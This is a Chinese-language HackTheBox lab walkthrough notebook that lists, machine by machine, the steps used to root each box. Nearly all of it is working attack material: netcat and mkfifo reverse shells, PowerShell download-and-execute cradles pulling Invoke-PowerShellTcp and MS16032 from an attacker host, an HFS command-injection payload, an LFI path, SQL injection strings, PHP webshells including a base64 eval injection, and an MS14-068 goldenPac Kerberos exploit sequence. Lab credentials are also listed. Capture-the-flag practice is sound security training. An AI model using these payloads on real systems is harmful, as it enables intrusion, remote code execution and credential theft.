hackthebox通关手记(持续更新)
简介:
花了点时间弄了几道题目。以前我是用windows渗透居多,在kali linux下渗透测试一直不怎么习惯。通过这几天做这些题目感觉顺手多了。有些题目脑洞也比较大,感觉很多也不适合于实际的环境
10.10.10.5
这题比较简单,ftp可以匿名登录并且可以put文件:anonymous,上传一句话或者是大马即可
期间有一个问题就是:大马下的shell不能type root.txt
我只好上传nc反弹才成功,反弹常用端口53,443。
C:\inetpub\wwwroot\nc.exe -e cmd.exe 10.10.xx.xx 443
Nc -lvvp 443
10.10.10.6
上传torrent,编辑图片上传test.php.png 利用菜刀上传到/tmp
Python back.py 10.10.14.22 1234
Nc -lvvp 1234
上传exp执行成功 cat root
10.10.10.7
elastaix 2.2本地文件包含漏洞
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf% 00&module=Accounts&action
hydra 破解收集到的用户密码
10.10.10.8
HFS远程代码执行漏洞
tcpdump -I tun0
远程执行ps1脚本
powershell -nop -c IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.22:8000/’)
Sublime Invoke-PowerShellTcp.ps1
/?search==%00{.exec|c:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Invoke-PowerShellTcp.ps1').}
nc -lvvp 1337
发现 存在的漏洞:
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Sherlock.ps1')
执行ms16032并加载shelltcp.ps1
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.22:8000/Invoke-MS16032.ps1')
nc -lvvp 1338
10.10.10.9
Drupal(水滴)cms漏洞利用远程代码执行
Apt-get install php7.2-curl 需要装2018.2的kali,不然就是需要升级。我发现php7木有合适的php-curl模块
Php exploit.php。需要把php自己修改一下。 修改成一句话木马即可,毕竟国人我还是适应用菜刀。sad
update-alternatives --config java 更换一下java就可以使用knife了
10.10.10.10
这个漏洞挺有意思的。
Wpscan 枚举到用户名takis
steghide extract -sf HackerAccessGranted.jpg 会导出id_rsa
ssh2john id_rsa > id_john
john id_john --wordlist=password.txt
ssh I id_rsa takis@10.10.10.10
superpassword
sudo /bin/fuckin bash
10.10.10.16
octobercms 扫目录backend 用户名密码:admin:admin 上传php5
迎合国际风格,实验环境直接用<?php echo system($_REQUEST['cmd']);?>
10.10.10.22
需要设置hosts
vi /etc/hosts
10.10.10.24
这题何有意思
curl直接下载
python -m SimpleHTTPServer
http://10.10.10.24/uploads/sec.php?sec=nc -e /bin/sh 10.10.14.22 8088
python3 -c 'import pty; pty.spawn("/bin/bash")'
10.10.10.31
在忘记密码处可以注入
a@b.c' uniOn select 1,2,3,concat(__username_,"@example.com") FROM supercms.operators limit 1,1 -- -
a@b.c' uniOn select 1,2,3,concat(__password_,"@example.com") FROM supercms.operators limit 1,1 -- -
super_cms_adm
tamarro
反弹shell,其实不反弹也可以
sec=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f=
Pip install gmpy2 出错
apt-cache search libmpfr
find /usr -type f -name "libmpfr.s*"
ln -sf /usr/lib/x86_64-linux-gnu/libmpfr.so.6.0.1 /usr/lib/libmpfr.so.4
解决在此:https://blog.csdn.net/wanzt123/article/details/71036184?locationNum=8&fps=1
python RsaCtfTool.py --publickey /root/Desktop/crypt/decoder.pub --uncipherfile /root/Desktop/crypt/pass.crypt
nevermindthebollocks
supershell ‘/bin/ls$(cat /root/root.txt)’
10.10.10.37
在plugins目录下面有个jar,可以利用jd-gui反编译出MySQL的用户名和密码。
public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
phpmyadmin 一般有两种知道web路径导出shell、通过日志拿shell或者破解密码进入wp在后台getshell
利用密码猜解notch用户密码都是MySQL的密码
10.10.10.47
Donkey:d0nk3y1337!
import seccure
second = "\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa\"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec<K-gp9\xa0\xcb\xac\x9et\x89z\x13\x15\x94Dn\xeb\x95\x19[\x80\xf1\xa8,\x82G`\xee\xe8C\xc1\x15\xa1~T\x07\xcc{\xbd\xda\xf0\x9e\x1bh\'QU\xe7\x163\xd4F\xcc\xc5\x99w"
print seccure.decrypt(second, "PrinceCharming")
Sec shr3k1sb3st!
touch — — reference=thoughts.txt
10.10.10.48
比较有意思,树莓派系统pi-hole 系统是Raspbian,有个默认账户密码:pi:raspberry用ssh登陆cat user.txt
Sudo -i 可以切换到root权限cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Sudo strings /dev/sdb即可
10.10.10.52
Sa m$$ql_S@_P@ssW0rd!
james@htb.local james J@m3s_P@ssW0rd!
git clone impacket
apt-get install krb5-user cifs-utils rdate
sublime /etc/hosts
10.10.10.52 mantis.htb.local mantis
sublime /etc/krb5.conf
[libdefaults]
default_realm = HTB.LOCAL
[realms]
HTB.LOCAL = {
kdc = mantis.htb.local:88
admin_server = mantis.htb.local
default_domain = HTB.LOCAL
}
[domain_realm]
.domain.internal = HTB.LOCAL
domain.internal = HTB.LOCAL
rdate -n 10.10.10.52
kinit james
rpcclient -U james 10.10.10.52
lookupnames james
S-1-5-21-4220043660-4019079961-2895681657-1103
python ms14-068.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis
cp TGT_james@HTB.LOCAL.ccache /tmp/krb5cc_0
J@m3s_P@ssW0rd!
cd impacket
python setup.py install
python goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 HTB.LOCAL/james@mantis.htb.local
10.10.10.60
/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+"<%3fphp+%40eval(base64_decode('ZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsg'))%3b%3f>">wup.php
Wup.php?cmd=cat /root/root.txt
10.10.10.65
sslyze --regular 10.10.10.65
Imagetrick
10.10.10.63
Jenkins为授权访问
http://10.10.10.63:50000/askjeeves/script